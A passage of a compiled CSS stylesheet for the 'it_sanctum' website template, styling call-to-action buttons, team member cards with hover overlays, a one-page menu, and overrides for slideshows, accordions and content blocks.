  transition: all 0.2s;
}
/* line 128, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-right .button:hover {
  background-color: #4f953b;
  color: #fff;
}
@media only all and (max-width: 47.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    display: block;
    text-align: center;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-cta-button.style2 .g-cta-inner .g-cta-right .button {
    padding: 1rem;
  }
}
/* line 143, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-right .button i {
  margin-right: 10px;
}
/* line 148, templates/it_sanctum/scss/sanctum/_cta-button.scss */
.g-cta-button.style2 .g-cta-inner .g-cta-title {
  margin: 0 0 10px;
}
/* line 1, templates/it_sanctum/scss/sanctum/_page-title.scss */
.g-page-title {
  text-align: center;
}
@media only all and (max-width: 47.938rem) {
  .g-page-title {
    margin-bottom: -30px;
  }
}
/* line 6, templates/it_sanctum/scss/sanctum/_page-title.scss */
.g-page-title h3 {
  margin: 0;
}
/* line 9, templates/it_sanctum/scss/sanctum/_page-title.scss */
.g-page-title i {
  display: block;
}
/* line 4, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 8, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
/* line 12, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 13, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 14, templates/it_sanctum/scss/sanctum/_our-team.scss */
@media only all and (max-width: 47.938rem) {
  .g-our-team:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-our-team-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-our-team:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_our-team.scss */
@media only all and (max-width: 47.938rem) {
  .g-our-team:not(.gutter-disabled) .g-our-team-item {
    margin-bottom: 1.876rem !important;
  }
}
/* line 32, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.938rem) {
  .g-our-team .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 41, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.938rem) {
  .g-our-team .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 51, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team, .g-our-team-slider, .g-our-team-slideset {
  text-align: center;
}
/* line 53, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 54, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.gutter-disabled .g-our-team-item, .g-our-team-slider.gutter-disabled .g-our-team-item, .g-our-team-slideset.gutter-disabled .g-our-team-item {
  border: none;
}
/* line 57, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.gutter-disabled .uk-slideset, .g-our-team-slider.gutter-disabled .uk-slideset, .g-our-team-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
/* line 59, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 60, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.gutter-disabled .uk-slideset.uk-grid > *, .g-our-team-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-our-team-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
/* line 66, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-content, .g-our-team-slider .g-content, .g-our-team-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 71, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-item, .g-our-team-slider .g-our-team-item, .g-our-team-slideset .g-our-team-item {
  border: 1px solid #ddd;
  width: 100%;
}
@media only all and (max-width: 47.938rem) {
  .g-our-team .g-our-team-item, .g-our-team-slider .g-our-team-item, .g-our-team-slideset .g-our-team-item {
    margin-bottom: 3.126rem;
    width: 100%;
  }
  /* line 77, templates/it_sanctum/scss/sanctum/_our-team.scss */
  .g-our-team .g-our-team-item:last-child, .g-our-team-slider .g-our-team-item:last-child, .g-our-team-slideset .g-our-team-item:last-child {
    margin-bottom: 0;
  }
}
/* line 82, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-image, .g-our-team-slider .g-our-team-image, .g-our-team-slideset .g-our-team-image {
  position: relative;
  overflow: hidden;
}
/* line 85, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 86, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel {
  padding: 0;
}
/* line 88, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a {
  width: 100%;
  display: block;
  padding: 10px;
  border: 1px solid rgba(255, 255, 255, 0.2);
  border-right: none;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a {
    padding: 10px 5px;
  }
}
/* line 98, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover, .g-our-team-slider .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover, .g-our-team-slideset .g-our-team-image .g-our-team-social.uk-overlay-panel a:hover {
  background: #4f953b;
}
/* line 103, templates/it_sanctum/scss/sanctum/_our-team.scss */
@media only all and (max-width: 47.938rem) {
  .g-our-team .g-our-team-image .g-our-team-social .g-block, .g-our-team-slider .g-our-team-image .g-our-team-social .g-block, .g-our-team-slideset .g-our-team-image .g-our-team-social .g-block {
    -webkit-box-flex: 1;
    -moz-box-flex: 1;
    box-flex: 1;
    -webkit-flex: 1;
    -moz-flex: 1;
    -ms-flex: 1;
    flex: 1;
  }
}
/* line 109, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-image img, .g-our-team-slider .g-our-team-image img, .g-our-team-slideset .g-our-team-image img {
  width: 100%;
}
/* line 113, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-info-container, .g-our-team-slider .g-info-container, .g-our-team-slideset .g-info-container {
  padding: 20px;
  background: #fff;
}
/* line 117, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team p, .g-our-team-slider p, .g-our-team-slideset p {
  margin: 0;
}
/* line 120, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-name, .g-our-team-slider .g-our-team-name, .g-our-team-slideset .g-our-team-name {
  margin: 0;
}
/* line 122, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-name a, .g-our-team-slider .g-our-team-name a, .g-our-team-slideset .g-our-team-name a {
  color: #282828;
}
/* line 124, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-name a:hover, .g-our-team-slider .g-our-team-name a:hover, .g-our-team-slideset .g-our-team-name a:hover {
  color: #4f953b;
}
/* line 129, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-position, .g-our-team-slider .g-our-team-position, .g-our-team-slideset .g-our-team-position {
  margin-top: 0;
  font-size: 90%;
}
/* line 132, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-position.g-desc-enabled, .g-our-team-slider .g-our-team-position.g-desc-enabled, .g-our-team-slideset .g-our-team-position.g-desc-enabled {
  margin-bottom: 20px;
}
/* line 136, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team .g-our-team-desc, .g-our-team-slider .g-our-team-desc, .g-our-team-slideset .g-our-team-desc {
  margin-top: 0.4rem;
}
/* line 139, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 140, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style2 .g-our-team-social, .g-our-team-slider.style2 .g-our-team-social, .g-our-team-slideset.style2 .g-our-team-social {
  margin-top: 20px;
}
/* line 142, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style2 .g-our-team-social a, .g-our-team-slider.style2 .g-our-team-social a, .g-our-team-slideset.style2 .g-our-team-social a {
  color: #4e4e4e;
  margin-right: 15px;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-our-team.style2 .g-our-team-social a, .g-our-team-slider.style2 .g-our-team-social a, .g-our-team-slideset.style2 .g-our-team-social a {
    margin-right: 8px;
  }
}
/* line 148, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style2 .g-our-team-social a:last-child, .g-our-team-slider.style2 .g-our-team-social a:last-child, .g-our-team-slideset.style2 .g-our-team-social a:last-child {
  margin-right: 0;
}
/* line 151, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style2 .g-our-team-social a:hover, .g-our-team-slider.style2 .g-our-team-social a:hover, .g-our-team-slideset.style2 .g-our-team-social a:hover {
  color: #4f953b;
}
/* line 157, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 158, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 159, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.uk-text-left.style1 .g-our-team-social, .g-our-team-slider.uk-text-left.style1 .g-our-team-social, .g-our-team-slideset.uk-text-left.style1 .g-our-team-social {
  text-align: center !important;
}
/* line 164, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 165, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-image, .g-our-team-slider.style3 .g-our-team-image, .g-our-team-slideset.style3 .g-our-team-image {
  padding-bottom: 100px;
}
/* line 168, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-info-container, .g-our-team-slider.style3 .g-info-container, .g-our-team-slideset.style3 .g-info-container {
  position: absolute;
  bottom: 0;
  left: 0;
  right: 0;
  top: auto;
  z-index: 1;
  padding: 23px 30px;
  height: 100px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 178, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-info-container .g-our-team-position, .g-our-team-slider.style3 .g-info-container .g-our-team-position, .g-our-team-slideset.style3 .g-info-container .g-our-team-position {
  margin: 5px 0 0;
}
/* line 182, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container, .g-our-team-slider.style3 .g-hover-container, .g-our-team-slideset.style3 .g-hover-container {
  opacity: 0;
  position: absolute;
  background-color: #111;
  color: #fff;
  top: 100px;
  left: 0;
  bottom: 0;
  right: 0;
  padding: 30px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 193, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container > *, .g-our-team-slider.style3 .g-hover-container > *, .g-our-team-slideset.style3 .g-hover-container > * {
  opacity: 0;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 197, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container .g-our-team-desc, .g-our-team-slider.style3 .g-hover-container .g-our-team-desc, .g-our-team-slideset.style3 .g-hover-container .g-our-team-desc {
  font-size: 90%;
}
/* line 200, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container .g-our-team-social, .g-our-team-slider.style3 .g-hover-container .g-our-team-social, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social {
  margin-top: 25px;
  font-size: 18px;
}
/* line 203, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container .g-our-team-social a, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a {
  margin-right: 15px;
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-our-team.style3 .g-hover-container .g-our-team-social a, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a {
    margin-right: 8px;
  }
}
/* line 208, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-hover-container .g-our-team-social a:last-child, .g-our-team-slider.style3 .g-hover-container .g-our-team-social a:last-child, .g-our-team-slideset.style3 .g-hover-container .g-our-team-social a:last-child {
  margin-right: 0;
}
/* line 214, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item, .g-our-team-slider.style3 .g-our-team-item, .g-our-team-slideset.style3 .g-our-team-item {
  position: relative;
}
/* line 216, templates/it_sanctum/scss/sanctum/_our-team.scss */
/* line 217, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-hover-container, .g-our-team-slider.style3 .g-our-team-item:hover .g-hover-container, .g-our-team-slideset.style3 .g-our-team-item:hover .g-hover-container {
  opacity: 1;
}
/* line 219, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-hover-container > *, .g-our-team-slider.style3 .g-our-team-item:hover .g-hover-container > *, .g-our-team-slideset.style3 .g-our-team-item:hover .g-hover-container > * {
  -webkit-transition-delay: 0.3s;
  -moz-transition-delay: 0.3s;
  transition-delay: 0.3s;
  opacity: 1;
}
/* line 224, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-info-container, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container {
  bottom: 100%;
  margin-bottom: -100px;
  background: #4f953b;
  color: #fff;
}
/* line 229, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name {
  color: #fff !important;
}
/* line 231, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a {
  color: #fff !important;
}
/* line 233, templates/it_sanctum/scss/sanctum/_our-team.scss */
.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover {
  text-decoration: underline;
}
/* line 4, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul {
  margin: 0;
  list-style: none;
  background: #fff;
  border: 1px solid #ddd;
  border-radius: 3px;
}
/* line 11, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 12, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li a {
  padding: 0.625rem 1.25rem;
  color: #959595;
  display: block;
  border-bottom: 1px solid #ddd;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
/* line 18, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li a:hover {
  background: #ddd;
  color: #626262;
}
/* line 22, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li a i {
  margin-right: 5px;
}
/* line 26, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li:last-child a {
  border-bottom: none;
}
/* line 31, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu {
  border: none;
  display: none;
}
/* line 34, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu.uk-active {
  display: block;
}
/* line 36, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu.uk-active a {
  padding-left: 35px;
}
/* line 40, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 41, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu li:last-child {
  border-bottom: 1px solid #ddd;
}
/* line 46, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 47, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li.uk-active > a {
  background: #ddd;
  color: #4f953b;
}
/* line 51, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li.uk-active .submenu {
  display: block;
}
/* line 53, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li.uk-active .submenu a {
  padding-left: 35px;
}
/* line 2, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro {
  margin-bottom: 3rem;
  text-align: center;
}
/* line 6, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-particle-intro {
  margin-bottom: 3rem;
}
/* line 9, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-main-title {
  margin-bottom: 0;
}
/* line 12, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-title-separator {
  height: 1px;
  width: 70px;
  margin: 20px auto;
  background: #ddd;
}
/* line 17, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-title-separator.no-intro-text {
  margin: 2.5rem auto 0;
}
/* line 24, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 25, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 26, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
#g-to-top .style1 #g-totop-button {
  border-radius: 0;
}
/* line 32, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 33, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-item {
  box-shadow: none;
  border-radius: 0;
}
/* line 37, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-image {
  position: relative;
}
/* line 39, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-image img {
  border-radius: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-image.uk-overlay {
  border-radius: 0;
}
/* line 46, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #fff;
}
/* line 50, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-link {
  font-style: initial;
  border-bottom: 1px solid #4f953b;
  display: inline-block;
}
/* line 55, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-link i {
  display: none;
}
/* line 61, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-features-particle .g-features-particle-icon, .g-features-particle .g-circle-border {
  border-radius: 0;
}
/* line 65, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 66, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 67, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-features-particle .g-features-particle-item:hover .g-circle-border {
  border-color: #ddd;
}
/* line 74, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 75, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 76, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0;
}
/* line 82, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 83, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .g-slideshow-title, .g-slideshow .g-slideshow-desc {
  color: #959595 !important;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-title, .g-slideshow .g-slideshow-desc {
    display: initial;
  }
}
/* line 90, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .uk-overlay-background {
  background: transparent;
}
/* line 93, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 94, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .style2 .g-slideshow-title {
  font-size: 3rem;
  color: #959595 !important;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .style2 .g-slideshow-title {
    font-size: 1rem;
  }
}
/* line 101, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .style2 .g-slideshow-desc {
  font-size: 3rem;
  background: #4f953b;
  font-family: "Cormorant SC";
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .style2 .g-slideshow-desc {
    font-size: 1rem;
    display: initial;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 112, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
  .g-slideshow .uk-slideshow > li {
    min-height: 300px;
  }
}
/* line 116, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .uk-dotnav {
  margin-left: -15px;
}
/* line 121, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 122, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #ddd;
}
/* line 125, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro .g-content-pro-item .uk-overlay-bottom, .g-content-pro-slider .g-content-pro-item .uk-overlay-bottom, .g-content-pro-slideset .g-content-pro-item .uk-overlay-bottom {
  top: 0px;
}
/* line 129, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 130, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-content-pro-item, .g-content-pro-slider.style3 .g-content-pro-item, .g-content-pro-slideset.style3 .g-content-pro-item {
  border: none;
}
/* line 133, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: rgba(255, 255, 255, 0.9);
  border: 0px;
  margin: 1.5rem;
  display: -webkit-box;
  display: -moz-box;
  display: box;
  display: -webkit-flex;
  display: -moz-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -moz-box-align: center;
  box-align: center;
  -webkit-align-items: center;
  -moz-align-items: center;
  -ms-align-items: center;
  -o-align-items: center;
  align-items: center;
  -ms-flex-align: center;
  -webkit-align-content: center;
  -moz-align-content: center;
  align-content: center;
  -ms-flex-line-pack: center;
  -webkit-box-lines: multiple;
  -moz-box-lines: multiple;
  box-lines: multiple;
  -webkit-flex-wrap: wrap;
  -moz-flex-wrap: wrap;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
}
/* line 142, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title {
  margin: 0 auto;
}
/* line 144, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title a, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title a, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title a {
  color: #4f953b;
}
/* line 146, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title a:hover, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title a:hover {
  text-decoration: none;
  color: #325e25;
}
/* line 151, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title:after, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title:after, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title:after {
  content: "";
  width: 70px;
  height: 1px;
  display: block;
  background: #4f953b;
  margin: 1rem auto;
}
/* line 160, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-desc, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-desc, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-desc {
  color: #959595;
}
/* line 163, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-special, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-special, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-special {
  color: #959595;
}
/* line 166, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #4f953b;
}
/* line 168, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  text-decoration: none;
  color: #325e25;
}
/* line 173, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 174, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content {
  display: inline-block !important;
}
/* line 180, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro .uk-overlay-background, .g-content-pro-slider .uk-overlay-background, .g-content-pro-slideset .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #fff;
}
/* line 186, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 187, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item {
  margin-bottom: 10px;
}
/* line 188, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item .uk-accordion-title {
  background: #fff;
  padding: 0.675rem 1rem;
  border-radius: 0;
  margin-bottom: 0;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
/* line 194, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item .uk-accordion-title:hover, .g-accordion .g-accordion-item .uk-accordion-title.uk-active {
  border: 1px solid #ddd;
  background: transparent;
}
/* line 200, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item .uk-accordion-content {
  color: #fff;
  background: rgba(0, 0, 0, 0.8);
  padding: 15px;
}
/* line 206, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item:last-child {
  margin-bottom: 0;
}
/* line 212, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 213, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul {
  border-radius: 0;
}
/* line 216, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
